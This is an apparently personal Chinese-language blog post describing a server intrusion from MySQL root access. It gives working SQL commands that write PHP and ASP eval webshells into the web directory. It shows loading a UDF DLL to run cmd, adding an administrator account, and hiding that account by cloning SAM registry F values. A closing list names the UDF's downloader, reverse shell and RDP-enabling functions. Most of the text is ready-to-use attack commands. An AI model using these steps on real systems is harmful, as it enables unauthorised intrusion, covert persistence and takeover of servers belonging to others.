29月 |
|
有服务器mysql的root权限,所以从这里着手
在此之前需要爆asp或php执行文件的真实目录,还好一开始就知道目录所在
1、首先使用sql命令建立一个一句话木马服务器端,asp或php随意,php好用些
select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'F:\\xxx\\xxx\\xxx\\1.php'
也可以直接 select ‘<?php eval($_REQUEST[cmd]);?>’ into outfile 'F:\\xxx\\1.php'
select '<%execute request("c")%>' into outfile 'F:\\xxx\\xxx\\xxx\\1.asp'
2、之后使用一句话木马的客户端,上传su.php到网站目录。
3、打开su.php地址,按照提示登录之后,执行下面的命令
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user admin admin111 /add');
select cmdshell('net localgroup administrators admin /add');
drop function cmdshell;
这样如果开启了远程的话就可以直接连接服务器桌面了,然后建立隐藏管理员
1、建立结尾带符号$的帐号,并加入管理员组。命令行方式做随便。
2、运行打开regedt32,定位到 HKEY_LOCAL_MACHINE\SAM\SAM ,授权当前用户。
3、定位到 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\及其下的HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names,分别导出 代表默认管理员的000001fa4 、待隐藏管理员帐号对应的16进制数、待隐藏管理员帐号为3个reg文件。
4、修改待隐藏管理员帐号对应的16进制数和000001fa4所导出reg文件,让前者的F值等于后者的F值
5、删除新加的待隐藏管理员帐号
6、导入刚才的待隐藏管理员对应的2个reg文件,搞定
初窥小径,这可能连入门都不算吧。。
附功能函数说明:
cmdshell 执行cmd;
downloader 下载者,到网上下载指定文件并保存到指定目录;
open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
backshell 反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread 读注册表;
regwrite 写注册表;
shut 关机,注销,重启;
about 说明与帮助函数;
|
Tags:
|
 |
Response
|
在 说: 